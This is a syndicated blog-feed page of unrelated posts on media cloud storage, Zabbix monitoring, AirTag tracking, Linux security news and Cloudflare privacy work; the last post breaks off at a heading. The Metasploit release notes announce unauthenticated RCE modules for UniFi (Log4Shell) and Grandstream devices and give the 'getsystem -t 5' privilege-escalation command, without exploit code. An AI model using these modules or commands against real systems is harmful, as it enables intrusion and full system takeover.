Hybrid Cloud and Modern Workflows for Media Teams

Post Syndicated from Amanda Fesunoff original https://www.backblaze.com/blog/hybrid-cloud-and-modern-workflows-for-media-teams/

By any metric, the demands on media workflows are growing at an unprecedented rate. A Coughlin Associates Report of media and entertainment professionals predicts that overall cloud storage capacity for media and entertainment is expected to grow over 13.8 times between 2020 and 2026 (101.1EB to 140EB). It also predicts that, by the next decade, total video captured for a high-end digital production could be hundreds of petabytes, approaching one exabyte.

Businesses in the media and entertainment industry—from creative teams to production houses to agencies—must manage larger and larger stores of data and streamline production workflows that interact with those stores of data. Optimizing data-heavy workflows provides you with time and cost savings you can reinvest to prioritize the creative work that drives your business.

In today’s post, we’ll examine the trends shaping the media storage landscape, walk through each step of the media workflow, and provide strategies and tactics for reducing friction at each step along the way. Read on to learn how to modernize your media workflow to meet today’s data-heavy demands.

➔ Download Our Media Workflows E-book

Media Technology Trends and Impacts on Media Workflows

Technology is driving changes in media workflows. The media landscape of today looks very different than it did even a few short years ago. If you’re responsible for managing data and workflows for a creative team, understanding the broad trends in the media landscape can help you prepare to optimize your workflows and future-proof your data infrastructure. Here are a few key trends we see driving change across the media storage landscape.

Trend 1: Increased Demand for VR and Higher Resolution 4K and 8K Video Is Driving Workflow Modernization

While VR has been somewhat slow to build steam, demand for VR experiences has grown as the technology evolved. The industry as a whole is growing at a fast pace, with the global VR market size projected to increase from less than $5 billion in 2021 to more than $12 billion by 2024. Today, demands for stereoscopic VR, and VR in general, have increased storage requirements as data sets grow exponentially. Similarly, higher resolution demands more from media workflows, including more storage space, greater standards for compression, and higher performance hardware. All of these files also need to be constantly available and secure. As such, media workflows increasingly value scalable storage, as having to wait for additional storage may cause delays in project momentum/delivery.

Trend 2: Archiving and Content Preservation Needs Are Driving Storage Growth

While the need to digitally convert data from traditional film and tape has slowed, the enormous demand for digital storage for archived content continues to grow. According to the Coughlin Report, more than 174 exabytes of new digital storage will be used for archiving and content conversion and preservation by 2024.

Just as your storage needs for active projects continues to grow as file sizes continue to expand, expect to invest in storage for archival purposes as production continues apace. Furthermore, if you have content conversion or preservation needs, plan for storage needs to house digital copies. The plus side of this surge in archival and preservation demand is that the storage market will continue to be competitive, giving you plenty of choices at competitive rates.

Trend 3: Cloud Adoption Is Playing an Important Role in Enabling Collaboration Across Teams and Geographies

A study by Mesa of nearly 700 decision-makers and managers from media and entertainment companies found that they expect that 50% of their workforce will continue to work remotely. Accessing resources remotely used to be a challenge mired by latency issues, restrictions on file size, and subpar collaboration tools, but cloud adoption has eased these issues and will continue to do so as companies increasingly embrace long-term remote collaboration.

As you think about future-proofing your architecture, one factor to consider is cost, but also designing an architecture that enables your existing workflows to function remotely. A cloud storage provider with predictable pricing can address cost considerations and make cloud adoption even more of a no-brainer. And media workflows can adopt cloud-native solutions or integrate existing on-premises infrastructure with the cloud without additional hardware purchasing and maintenance. The result is that time and money that would have been spent on hardware can be reinvested into adopting new technology, meeting customers’ needs, and differentiating from competitors.

Steps in the Modern Media Workflow

With an understanding of these overarching trends, media and entertainment professionals can evaluate and analyze their workflow to meet future demands. To illustrate that, we’ll walk through an example cloud storage setup within a media workflow, including:

  1. Ingest to Local Storage.
  2. Video Editing Software.
  3. Media Asset Managers.
  4. Archive.
  5. Backup.
  6. Transcoding Software.
  7. Content Delivery.
  8. Cloud Storage.

Ingest to Local Storage

Creatives doing work in progress need high performance, local access storage such as NAS, SANs, etc. These are often backed up to cloud storage to have an off-site version of the current projects. Some examples include Synology and QNAP NAS devices as well as the OWC Jellyfish system. With Synology, you can use their Cloud Sync application to sync your files directly to your cloud bucket. Synology also offers many built-in integrations to various cloud providers. For QNAP, you can use QNAP Hybrid Backup Sync to archive or back up your content to your cloud account. OWC Jellyfish is optimized for video production workflows, and the Jellyfish lineup is embraced by video production teams for on-prem storage.

Video Editing Software

Video editing software is used to edit, modify, generate, or manipulate a video or movie file. Backblaze has a number of tools we support depending on your workflow. Adobe Premiere Pro and Avid Media Composer are two examples of film and video editing software. They are used to create videos, television shows, films, and commercials.

Media Asset Managers

A media asset manager, or MAM, is software used to add metadata, manage content, store media in a hybrid cloud, and share media. Examples of MAMs include iconik, eMAM, EditShare, and Archiware. You can store your media files directly to the cloud from these and other media asset managers, enabling monetization and quicker content delivery of older content.

Archive

An archive often consists of completed projects and infrequently-used assets that are stored away to keep primary production storage capacities under control. Examples of archive tools include LTO tape, external hard drives, servers, and cloud providers.

Backup

A backup is often used with new projects where raw media files are ingested into their systems and then backed up in case of accidental deletion so that they can be easily restored. Examples include LTO tape, external hard drives, servers, and cloud providers.

Transcoding Software

Transcoding software converts encoded digital files into an alternative digital format so that it can be viewed on the widest possible range of devices.

Content Delivery

Content delivery networks (CDNs) enable easy distribution of your content to customers. Examples include Fastly and Cloudflare. CDNs store content on edge servers closer to end users, speeding performance and reducing latency.

Cloud Storage

Cloud storage is integrated with all of the above tools, making it easy to store high resolution, native files for backup, active archives, primary storage, and origin stores. The media workflow tools have easy access to the stored content in the cloud via their user interface. Storing content in the cloud allows teams to easily collaborate, share, reuse, and distribute content. Cloud storage is also emerging as the storage of choice for workflows that use cloud-based MAMs.

illustration of a NAS device and cloud storage

The Benefits of Using a Hybrid Cloud Model for Media Workflows

Because media teams need both fast access and scalable storage, many adopt a hybrid cloud storage strategy. A hybrid cloud strategy combines a private cloud with a public cloud. For most media teams, the private cloud is typically hosted on on-premises infrastructure, but can be hosted by a third party. The key difference between a private and public cloud is that the infrastructure, hardware, and software for a private cloud are maintained on a private network used exclusively by your business or organization.

In a hybrid cloud workflow, media teams have fast, on-premises storage for active projects combined with the scalability of a public cloud to accommodate the large amounts of data media teams generate. Looking specifically at the cloud storage functions above, it is important to keep your local storage lean and mean so that it is fast and operating at peak performance for your creative team. This achieves two things. First, you don’t have to invest more in local storage which can be expensive and time consuming to maintain. And second, you can offload older projects to the cloud while maintaining easy accessibility.

According to a survey of IT decision makers who adopted a hybrid cloud approach: 26% of them said faster innovation was the most important benefit their business gained. 25% said it allowed them to have faster responses to their customers. 22% said it provided their business with better collaboration. Benefits of a hybrid cloud approach for media teams include:

  1. Affordability: Cloud storage can be lower cost versus expanding your own physical infrastructure.
  2. Accessibility: A hybrid cloud provides increased collaboration for a remote workforce.
  3. Scalability: Cloud scalability provides ease and control with scaling up or down.
  4. Innovation: Media teams have an increased ability to quickly test and launch new products or projects, when not bogged down by physical infrastructure.
  5. Data Protection & Security: Media teams benefit from reduced downtime and can bounce back quicker from events, failures, or disasters.
  6. Flexibility: Hybrid solutions allow media teams to maintain control of sensitive or frequently used data on-premises while providing the flexibility to scale in the cloud.

Want to learn more about hybrid clouds? Download our free e-book, “Optimizing Media Workflows in the Cloud,” today.

The post Hybrid Cloud and Modern Workflows for Media Teams appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Metasploit weekly wrap-up

Post Syndicated from Dean Welch original https://blog.rapid7.com/2022/01/28/metasploit-wrap-up-146/

I’m sure you know what’s coming, more Log4Shell

Metasploit weekly wrap-up

For those wondering when the Log4Shell remediation nightmare will end, I’m afraid I can’t give you that. What I can give you, though, is a new Log4Shell module! With the new module from zeroSteiner you can expect to get unauthenticated RCE on the Ubiquiti UniFi Controller Application via a POST request to the /api/login page. Be sure to leverage the module’s check function since scanners detecting header injection may not work.

A new getsystem technique for Meterpreter

smashery has done an amazing job working on giving us a fifth getsystem technique on the Windows Meterpreter. This newest addition ports Clément Labro’s PrintSpoofer technique to Metasploit. It gains SYSTEM privileges from the LOCAL SERVICE and NETWORK SERVICE accounts by abusing the SeImpersonatePrivilege privilege. Like the other getsystem techniques, this attack takes place entirely in memory without any additional configuration on both 32-bit and 64-bit versions of Windows. It has been tested successfully on Windows 8.1 / Server 2016 and later. Unlike some of the other getsystem technqiues this one also has the advantage of not starting services which is often an action that is identified as malicious. Users can run this elevation technique directory by using the getsystem -t 5 command in Meterpreter. Now exploits that yield sessions LOCAL SERVICE and NETWORK SERVICE permissions can easily be upgraded to full SYSTEM level privileges.

New module content (2)

  • Grandstream UCM62xx IP PBX sendPasswordEmail RCE by jbaines-r7, which exploits CVE-2020-5722 – A new exploit module for CVE-2020-5722 has been added which exploits an unauthenticated SQL injection vulnerability and a command injection vulnerability affecting the Grandstream UCM62xx IP PBX series of devices to go from an unauthenticated remote user to root level code execution.
  • UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell) by Nicholas Anastasi, RageLtMan, and Spencer McIntyre, which exploits CVE-2021-44228 – A module has been added to exploit CVE-2021-44228, an unauthenticated RCE in the Ubiquiti Unifi controller application versions 5.13.29 through 6.5.53 in the remember field of a POST request to the /api/login page. Successful exploitation results in OS command execution in the context of the server application.

Enhancements and features

  • #15904 from smashery – This PR adds the logic to support a fifth getsystem option using SeImpersonatePrivilege to gain SYSTEM privileges using the Print Spooler primitive on Windows. It is the Framework side of https://github.com/rapid7/metasploit-payloads/pull/509.
  • #16020 from VanSnitza – The exploit/scanner/auxiliary/scada/modbusclient module has been enhanced to support command 0x2B which gives clear text info about a device. Additionally the module’s code has been updated to comply with RuboCop standards.
  • #16090 from audibleblink – A new method user_data_directory has been added to lib/msf/base/config.rb to allow users that use private Metasploit modules to keep module resources organized in the same way that MSF does for core modules, all whilst keeping their ~/.msf4 directory portable between installs.
  • #16096 from zeroSteiner – The implementation of the ReverseListenerComm and ListenerComm datastore options have now been updated to support specifying -1 to refer to the most recently created session without having to either remember what it was or change it when a new session is created.
  • #16106 from bwatters-r7 – This PR updates the stdapi_fs_delete_dir command to recursively delete the directory. Previously, we discovered some inconsistencies in the handling of directory deletion across Meterpreter payloads, and this implements a fix in the Linux Meterpreter to support recursive deletion of directories, even if they contain files, matching implementations in other Meterpreter types.

Bugs fixed

  • #16054 from namaenonaimumei – This PR updates John the Ripper (JTR) compatibility by altering the flag used to prevent logging.
  • #16104 from zeroSteiner – Fixes a crash in the portfwd command which occurred when pivoting a reverse_http Python Meterpreter through a reverse_tcp Windows Meterpreter

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

[$] Handling argc==0 in the kernel

Post Syndicated from original https://lwn.net/Articles/882799/rss

By now, most readers are likely to be familiar with the Polkit vulnerability known as CVE-2021-4034.
The fix for Polkit is relatively straightforward and is being rolled out
across the net. The root of this problem, though, lies in a
misunderstanding about how programs are run on Unix-like systems. This
problem is highly likely to exist in other programs, so it would be nice to
find a more general solution. The best place to address this issue may be
in the kernel, but properly working around this
misunderstanding without causing regressions is not an easy task.

Security updates for Friday

Post Syndicated from original https://lwn.net/Articles/883047/rss

Security updates have been issued by CentOS (java-1.8.0-openjdk), Debian (graphicsmagick), Fedora (grafana), Mageia (aom and roundcubemail), openSUSE (log4j and qemu), Oracle (parfait:0.5), Red Hat (java-1.7.1-ibm and java-1.8.0-openjdk), Slackware (expat), SUSE (containerd, docker, log4j, and strongswan), and Ubuntu (cpio, shadow, and webkit2gtk).

Zabbix meets television – Clever use of Zabbix features by Wolfgang Alper / Zabbix Summit Online 2021

Post Syndicated from Wolfgang Alper original https://blog.zabbix.com/zabbix-meets-television-clever-use-of-zabbix-features-by-wolfgang-alper-zabbix-summit-online-2021/19181/

TV broadcasting infrastructures have seen many great paradigm shifts over the years. From TV to live streaming – the underlying architecture consists of many moving parts supplied by different vendors and solutions. Any potential problems can cause critical downtimes, which are simply not acceptable. Let’s look at how Zabbix fits right into such a dynamic and ever-changing environment.

The full recording of the speech is available on the official Zabbix Youtube channel.

In this post, I will talk about how Zabbix is used in ZDF – Zweites Deutsche Fernsehen (Second German Television). I will specifically focus on the most unique and interesting use cases, and I hope that you will be able to use this knowledge in your next project.

ZDF – Some history

Before we move on with our unique use cases, I would like to introduce you to the history of ZDF. This will help you understand the scope and the potential complexity and scale of the underlying systems and company policies.

  • In 1961, the federal states established a central non-profit television broadcaster – Zweites Deutsches Fernsehen
  • In 1963 on April 1, ZDF officially went on air and had reached 61 percent of television viewers
  • On the Internet, a selection of programs is offered via live stream or video-on-demand through the ZDFmediathek, which has been in existence since 2001
  • Since February 2013, ZDF has been broadcasting its programs around the clock as an internet live stream
  • As of today, ZDF is one of the largest public broadcasters in Europe with permanent bureaus worldwide and is also present on various platforms like Youtube, Facebook, etc.

Here we can see that over the years, ZDF has made some major leaps – from a television broadcaster with the majority percentage of viewers to offering on-demand video service and moving to 24/7 internet live streams. ZDF has also scaled up its presence along with multiple different digital platforms as well as its physical presence all over the globe.

Integrating Zabbix with an external infrastructure monitoring system

In our first use case, we will cover integrating Zabbix with an external infrastructure monitoring system. As opposed to monitoring IT metrics like hard drive space, memory usage, or CPU loads – this external system is responsible for monitoring devices like power generators, transmission stations, and other similar components. The idea was to pass the states of these components to Zabbix. This way, Zabbix would serve as a central “Umbrella” monitoring system.

In addition, the components that are monitored by the external system have states and severities, but the severities are not static and can vary depending on the monitored component. What this means is that each component could generate problems of varying severities. We had to figure out a way to assign the correct severities to each of the external components. Our approach was split into multiple steps:

  • Use Zabbix built-in HTTP check to get LLD discovery data
    • The external monitoring system provides an API, which we can use to obtain the necessary LLD information by using the HTTP checks
    • Zabbix-sender was used for testing since the HTTP items support receiving data from it
  • Use Zabbix built-in HTTP check as a collector to obtain the component status metrics
  • Define item prototypes as dependant items to extract data from collector item
  • Create “smart “trigger prototypes to respect severity information from the LLD data

The JSON below is an example of the LLD data that we are receiving from the external monitoring systems. In addition to component names, descriptions, and categories, we are also providing the severity information. The severities that have a value of -1 are not used, while other severities are cross-checked with the status value retrieved from the returned metrics:

{
"{#NAME}": "generator-secondary",
"{#DISPLAYNAME}": "Secondary power generator",
"{#DESCRIPTION}": "Secondary emergency power generator",
"{#CATEGORY}": "Powersupply",
"{#PRIORITY.INFORMATION}": -1,
"{#PRIORITY.WARNING}": -1,
"{#PRIORITY.AVERAGE}": -1,
"{#PRIORITY.HIGH}": 1,
"{#PRIORITY.DISASTER}": 2
}

Below we can see the returned metrics – the component name and its current status. For example, status = 1 value references the {#PRIORITY.HIGH} from the LLD JSON data.

"generator-primary": {
"status": 0,
"message": "Generator is healthy."
},
"generator-secondary": {
"status": 1,
"message": "Generator is not working properly."
},

We can see that the first generator returns status = 0, which means that the generator is healthy and there are no problems, while the secondary generator is currently not working properly – status = 1 and should generate a problem with severity High.

Below we can see how the item prototypes are created for each of the components – one item prototype collects the message information, while the other collects the current status of the component. We use JSONPath preprocessing to obtain these values from our master item.

As for the trigger prototypes – we have defined a trigger prototype for each of the trigger severities. The trigger prototypes will then create triggers depending on the information contained in the LLD macros for a given component.

As you can see, the trigger expressions are also quite simple – each trigger simply checks if the last received component status matches the specific trigger threshold status value.

The resulting metrics provide us both the status value and the component status message. As we can see, the triggers are also generating problems with dynamic severities.

Improving the solution with LLD overrides

The solution works – but we can do better! You might have already guessed the underlying issue with this approach: our LLD rule creates triggers for every severity, even if it isn’t used. The threshold value for these unused triggers will use value -1, which we will never receive, so the unused triggers will always stay in the OK state. Effectively – we have created 5 trigger definitions, while in our example, we require only 2 triggers.

How can we resolve this? Thankfully, Zabbix provides just the right tool for the job – LLD Overrides! We have created 5 overrides on our discovery rule – one for each severity:

In the override conditions, we will specify that if the value contained in the priority LLD macros is equal to -1, we will not be discovering the trigger of the specific severity.

The final result looks much cleaner – now we have only two trigger definitions instead of five. 

 

This is a good example of how we can use LLD together with master items obtaining data from external APIs and also improve the LLD logic by using LLD overrides.

“Sphinx” application monitoring using Graylog REST API

For our second example, we will be monitoring the Sphinx application by using the Graylog REST API. Graylog is a log management tool that we use for log collection – it is not used for any kind of alerting. We also have an application called Sphinx, which consists of three components – a Web component, an App component, and a WCF Gateway component. Our goal here is to:

  • Use Zabbix for evaluating error messages related to Sphinx from Graylog
  • Monitor the number of errors in user-defined time intervals for different components and alert when a threshold is exceeded
  • Analyze the incoming error message and prepare them for a user-friendly output sorted by error types

The main challenges posed by this use-case are:

  • How to obtain Sphinx component information from Graylog
  • How to handle certificate problems (DH_KEY_TOO_SMALL / Diffie-Hellman key) due to an outdated version of the installed Graylog server
  • How to sort the error messages coming in “Free form” without explicit error types

Collecting the data from Graylog

Since the Graylog application used in the current scenario was outdated, we had to work around the certificate issues by using the Zabbix external check item type. Once again, we will be using master and dependent item logic – we will create three master items (one for each component) and retrieve the component data. All additional information will be retrieved by the dependent items as to not cause extra performance impact by flooding the Graylog API endpoint. The data itself was parsed and sorted by using Javascript preprocessing. The dependent item prototypes are used here to create the items for the obtained stats and the data used for visualizing each error type on a user-friendly dashboard.

Let’s take a look at the detailed workflow for this use case:

  • An External check for scanning the Graylog stream Sphinx App Raw
  • A dependent item which analyzes and filters the raw data by using preprocessing Sphinx App Raw Filtered
  • This dependent item is used as a master item for our LLD Sphinx App Error LLD
  • The same dependent item is also used as a master item for our item prototypes – Sphinx App Error count and Sphinx App Error List

Effectively this means that we perform only a single call to the Graylog API, and all of the heavy lifting is done by the dependent item in the middle of our workflow.
The following workflow is used to obtain the information only about the App component – remember, we have two other components where this will have to be implemented – Web and Gateway.

In total, we will have three master items for each of the APP components:

They will use the following shell script to execute the REST API call to the Graylog API:

graylog2zabbix.sh[{$GRAYLOG_USERNAME},{$GRAYLOG_PASSWORD},{HOST.CONN},{$GRAYLOG_PORT},search/universal/relative?
query=name%3Asphinx-app%20AND%20stage%3Aproduction%20AND%20level%3A(ERROR%20OR
%20FATAL)&range=1800&limit=50&filter=streams%3A60000a8c1c09f9862279966e&fields=name%2Clevel
%2Cmessage&decorate=true]

The data that we obtain this way is extremely hard to work with without any additional processing. It very much looks like a set of regular log entries – this complicates the execution of any kind of logic in reaction to receiving this kind of data:

For this reason, we have created a dependent item, which uses preprocessing to filter and sort this data. The dependent item preprocessing is responsible for:

  • Analyzing the error messages
  • Defining the error type
  • Sorting the raw data so that we can work with it more easily

We have defined two preprocessing steps to process this data. We have the JSONPath preprocessing step to select the message from the response and a Javascript preprocessing script that does the heavy lifting. You can see the Javascript script below. It uses Regex and performs data preparation and sorting. In the last line, you can see that the data is transformed back into JSON, so we can work with it down the line by using the JSONpath preprocessing steps for our dependent items.

Below we can see the result. The data stream has been sorted and arranged by error types, which you can see on the left-hand side. All of the logged messages are now children that belong to one of these error types.

We have also created  3 LLD rules – one for each component. These LLD rules create items for each error type for each component. To achieve this, there is also some additional JSONPath and Javascript preprocessing done on the LLD rule itself:

The end result is a dashboard that uses the collected information to display the error count per component. Attached to the graph, we can see some additional details regarding the log messages related to the detected errors.

Monitoring of TV broadcast trucks

I would like to finish up this bost by talking about a completely different use case – monitoring of TV broadcast trucks!

In comparison to the previous use cases – the goals and challenges here are quite unique. We are interested in a completely different set of metrics and have to utilize a different approach to obtain them. Our goals are:

  • Monitor several metrics from different systems used in the TV broadcast truck
  • Monitor the communication availability and quality between the broadcast truck and the transmitting station
  • Only monitor the broadcast truck when it is in use

One of the main challenges for this use case is avoiding false alarms. How can we avoid false positives if a broadcast truck can be put into operation at any time without notifying the monitoring team? The end goal is to monitor the truck when it’s in use and stop monitoring it when it’s not in use.

  • Each broadcast truck is represented by a host in Zabbix – this way, we can easily put it into maintenance
  • A control host is used to monitor the connection states of all broadcasting trucks
  • We decided on creating a middleware application that would be able to implement start/stop monitoring logic
    • This was achieved by switching the maintenance on/off by using the Zabbix API
  • A specific application in the broadcasting truck then tells Zabbix how long to monitor it and when to enable the maintenance for the said truck

Below we can see the truck monitoring workflow. The truck control host gets the status for each truck to decide when to start monitoring the truck. The middleware then starts/stops the monitoring of a truck by using Zabbix API to control the maintenance periods for the trucks. Once a truck is in service, it also passes the monitoring duration to the middleware, so the middleware can decide when the monitoring of a specific truck should be turned off.

Next, let’s look at the truck control workflow from the Zabbix side.

  • Each broadcast truck is represented by a single trigger on the control host
    • The trigger actions forward the information that the truck maintenance period should be disabled to the middleware
  • Middleware uses the Zabbix API to disable the maintenance for the specific truck
  • The truck is now monitored
  • The truck forwards the Monitoring duration to the middleware
  • Once the monitoring duration is over, the middleware enables the maintenance for the specific truck

Finally, the trucks are displayed on a map which can be placed on our dashboards. The map displays if the truck is maintenance (not active) and if it has any problems. This way, we can easily monitor our broadcast truck fleet.

From gathering data from external systems to performing complex data transformations with preprocessing and monitoring our whole fleet of broadcast trucks – I hope you found these use cases useful and were able to learn a thing or two about the flexibility of different Zabbix features!

The post Zabbix meets television – Clever use of Zabbix features by Wolfgang Alper / Zabbix Summit Online 2021 appeared first on Zabbix Blog.

Tracking Secret German Organizations with Apple AirTags

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/01/tracking-secret-german-organizations-with-apple-airtags.html

A German activist is trying to track down a secret government intelligence agency. One of her research techniques is to mail Apple AirTags to see where they actually end up:

Wittmann says that everyone she spoke to denied being part of this intelligence agency. But what she describes as a “good indicator,” would be if she could prove that the postal address for this “federal authority” actually leads to the intelligence service’s apparent offices.

“To understand where mail ends up,” she writes (in translation), “[you can do] a lot of manual research. Or you can simply send a small device that regularly transmits its current position (a so-called AirTag) and see where it lands.”

She sent a parcel with an AirTag and watched through Apple’s Find My system as it was delivered via the Berlin sorting center to a sorting office in Cologne-Ehrenfeld. And then appears at the Office for the Protection of the Constitution in Cologne.

So an AirTag addressed to a telecommunications authority based in one part of Germany, ends up in the offices of an intelligence agency based in another part of the country.

Wittmann’s research is also now detailed in the German Wikipedia entry for the federal telecommunications service. It recounts how following her original discovery in December 2021, subsequent government press conferences have denied that there is such a federal telecommunications service at all.

Here’s the original Medium post, in German.

In a similar story, someone used an AirTag to track her furniture as a moving company lied about its whereabouts.

Happy Data Privacy Day!

Post Syndicated from Emily Hancock original https://blog.cloudflare.com/privacyday2022/

Happy Data Privacy Day!

Happy Data Privacy Day!

Happy Data Privacy Day 2022! Of course, every day is privacy day at Cloudflare, but today gives us a great excuse to talk about one of our favorite topics.

In honor of Privacy Day, we’re highlighting some key topics in data privacy and data protection that helped shape the landscape in 2021, as well as the issues we’ll be thinking about in 2022. The first category that gets our attention is the intersection of data security and data privacy. At Cloudflare, we’ve invested in privacy-focused technologies and security measures that enhance data privacy to help build the third phase of the Internet, the Privacy phase, and we expect to double down on these developments in 2022.

The second category is data localization. While we don’t think you need localization to achieve privacy, the two are inextricably linked in the EU regulatory landscape and elsewhere.

Third, recent regulatory enforcement actions in the EU against websites’ use of cookies have us thinking about how we can help websites run third-party tools, such as analytics, in a faster, more secure, and more privacy-protective way.

Lastly, we’ll continue to focus on the introduction of new or updated data protection regulations around the world, as well as regulation governing digital services, which will inevitably have implications for how personal and non-personal data is used and transferred globally.

Security to ensure Privacy

Cloudflare’s founding mission to help build a better Internet has always included focusing on privacy-first products and services. We’ve written before about how we think a key way to improve privacy is to reduce the amount of personal data flowing across the Internet. This has led to the development and deployment of technologies to help personal data stay private and keep data secure from would-be attackers. Examples of prominent technologies include Cloudflare’s 1.1.1.1 public DNS resolver — the Internet’s fastest, privacy-first public DNS resolver that does not retain any personal data about requests made — and Oblivious DNS over HTTPs (ODoH) — a proposed DNS standard co-authored by engineers from Cloudflare, Apple, and Fastly that separates IP addresses from queries, so that no single entity can see both at the same time.

We’re looking forward to continued work on privacy enhancing technologies in 2022, including efforts to generalize ODoH technology to any application HTTP traffic through Oblivious HTTP (OHTTP). Cloudflare is proud to be an active contributor to the Internet Engineering Task Force’s OHAI (Oblivious HTTP Application Intermediation) working group where Oblivious HTTP will be developed. Similar to ODoH, OHTTP allows a client to make multiple requests of a server without the server being able to link those requests to the client or to identify the requests as having come from the same client.

But there are times when retaining identity is important, such as when you are trying to access your employer’s network while working from home — something many of us have become all too familiar with over the past two years. However, organizations shouldn’t have to choose between protecting privacy and implementing Zero Trust solutions to guard their networks from common remote work pitfalls: employees working from home who fail to access their work networks through secure methods or fall victim to phishing and malware attacks.

So not only have we developed Cloudflare’s Zero Trust Services to help organizations secure their networks, we also went beyond mere security to create privacy-enhancing Zero Trust products. In 2021, the Cloudflare Zero Trust team took a big privacy step forward by building and launching Selective Logging into Cloudflare Gateway. Cloudflare Gateway is one component of our suite of services that helps enterprises secure their networks. Other components include Zero Trust access for an enterprise’s applications that allows for the authentication of users on our global network and a fast and reliable solution for remote browsing that allows enterprises to execute all browser code in the cloud.

With Selective Logging, Gateway Admins can now tailor their logs or disable all Gateway logging to fit an enterprise’s privacy posture. Admins can “Enable Logging of only Block Actions,” “Disable Gateway Logging for Personal Information,” or simply “Disable All Gateway Logging.” This allows an enterprise to decide not to collect any personal data for users who are accessing their internal organizational networks. The less personal data collected, the less chance any personal data can be stolen, leaked, or misused. Meanwhile, Gateway still protects enterprises by blocking malware or command & control sites, phishing sites, and other URLs that are disallowed by their enterprise’s security policy.

As many employers have moved to permanent remote work, at least part-time, Zero Trust solutions will continue to be important in 2022. We are excited to give those employers tools that help them secure their networks in ways that allow them to simultaneously protect employee privacy.

Of course, we can’t talk about pro-privacy security issues without mentioning the Log4j vulnerability exposed last month. That vulnerability highlighted just how critically important security is to protecting the privacy of personal data. We explained in depth how this vulnerability works, but in summary, the vulnerability allowed an attacker to execute code on a remote server. This can allow for the exploitation of Java-based Internet facing software that uses Log4j, but what makes Log4j even more insidious is that non-Internet facing software can also be exploitable as data gets passed from system to system. For example, a User-Agent string containing the exploit could be passed to a backend system written in Java that does indexing or data science and the exploit could get logged. Even if the Internet-facing software is not written in Java it is possible that strings get passed to other systems that are in Java allowing the exploit to happen.

This means that unless the vulnerability is remediated, an attacker could execute code that not only exfiltrates data from a web server but also steal personal data from non-Internet facing backend databases, such as billing systems. And because Java and Log4j are so widely used, thousands of servers and systems were impacted, which meant millions of users’ personal data was at risk.

We’re proud that, within hours of learning of the Log4j vulnerability, we rolled out new WAF rules written to protect all our customers’ sites (and our own) against this vulnerability. In addition, we and our customers were able to use our Zero Trust product, Cloudflare Access, to protect access to internal systems. Once we or a customer enabled Cloudflare Access on the identified attack surface, any exploit attempts to Cloudflare’s systems or the systems of customers would have required the attacker to authenticate. The ability to analyze server, network or traffic data generated by Cloudflare in the course of providing our service to the huge number of Internet applications that use us helped us better protect all of Cloudflare’s customers. Not only were we able to update WAF rules to mitigate the vulnerability, Cloudflare could use data to identify WAF evasion patterns and exfiltration attempts. This information enabled our customers to rapidly identify attack vectors on their own networks and mitigate the risk of harm.

As we discuss more below, we expect data localization debates to continue in 2022. At the same time, it’s important to realize that, if companies are forced to segment data by jurisdiction or to prevent access to data across jurisdictional borders, it would have been harder to mount the kind of response we were able to quickly provide to help our customers protect their own sites and networks against Log4j. We believe in ensuring both the privacy and security of data no matter what jurisdiction that data is stored in or flows through. And we believe those who would insist on data localization as a proxy for data protection above all else do a disservice to the security measures that are as important as regulations, if not more so, to protecting the privacy of personal data.

Data Localization

Data localization was a major focus in 2021 and that shows no sign of slowing in 2022. In fact, in the EU, the Austrian data protection authority (the Datenschutzbehörde) set quite the tone for this year. It published a decision January 13 stating that a European company could not use Google Analytics because it meant EU personal data was being transferred to the United States in what the regulator viewed as a violation of the EU General Data Protection Regulation (GDPR) as interpreted by the Court of Justice of the European Union’s 2020 decision in the “Schrems II” case.

We continue to disagree with the premise that the Schrems II decision means that EU personal data must not be transferred to the United States. Instead, we believe that there are safeguards that can be put in place to allow for such transfers pursuant to the EU Standard Contractual Clauses (SCCs) (contractual clauses approved by the EU Commission to enable EU personal data to be transferred outside the EU) in a manner consistent with the Schrems II decision. Cloudflare has had data protection safeguards in place since well before the Schrems II case, in fact, such as our industry-leading commitments on government data requests. We have updated our Data Processing Addendum (DPA) to incorporate the SCCs that the EU Commission approved in 2021. We also added additional safeguards as outlined in the EDPB’s June 2021 Recommendations on Supplementary Measures. Finally, Cloudflare’s services are certified under the ISO 27701 standard, which maps to the GDPR’s requirements.

In light of these measures, our EU customers can use Cloudflare’s services in a manner consistent with GDPR and the Schrems II decision. Still, we recognize that many of our customers want their EU personal data to stay in the EU. For example, some of our customers in industries like healthcare, law, and finance may have additional requirements. For these reasons, we developed our Data Localization Suite, which gives customers control over where their data is inspected and stored.

Cloudflare’s Data Localization Suite provides a viable solution for our customers who want to avoid transferring EU personal data outside the EU at a time when European regulators are growing increasingly critical of data transfers to the United States. We are particularly excited about the Customer Metadata Boundary component of the Data Localization Suite, because we have found a way to keep customer-identifiable end user log data in the EU for those EU customers who want that option, without sacrificing our ability to provide the security services our customers rely on us to provide.

In 2022, we will continue to fine tune our data localization offerings and expand to serve other regions where customers are finding a need to localize their data. 2021 saw China’s Personal Information Protection Law come into force with its data localization and cross-border data transfer requirements, and we are likely to see other jurisdictions, or perhaps specific industry guidelines, follow suit in 2022 in some form.

Pro-Privacy Analytics

We expect trackers (cookies, web beacons, etc.) to continue to be an area of focus in 2022 as well, and we are excited to play a role in ushering in a new era to help websites run third-party tools, such as analytics, in a faster, more secure, and more privacy-protective way. We were already thinking about privacy-first analytics in 2020 when we launched Web Analytics — a product that allowed websites to gather analytics information about their site users without using any client-side code.

Nevertheless, cookies, web beacons, and similar client-side trackers remain ubiquitous across the web. Each time a website operator uses these trackers, they open their site to potential security vulnerabilities, and they risk eroding the trust of their users who have grown weary of “cookie consent” banners and worry their personal data is being collected and tracked across the Internet. There has to be a better way, right? Turns out, there is.

As explained in greater detail in this blog post, Cloudflare’s Zaraz product not only allows a website to load faster and be more interactive, but it also reduces the amount of third-party code needed to run on a website, which makes it more secure. And this solution is also pro-privacy: it allows the website operator to have control over the data sent to third parties. Moving the execution of the third-party tools our network means website operators will be able to identify if tools are trying to collect personal data, and, if so, they can modify the data before it goes to the analytics providers (for example, strip URL queries, remove IP addresses of end users). As we’ve said so often, if we can reduce the amount of personal data that is sent across the Internet, that’s a win for privacy.

Changing Privacy Landscape

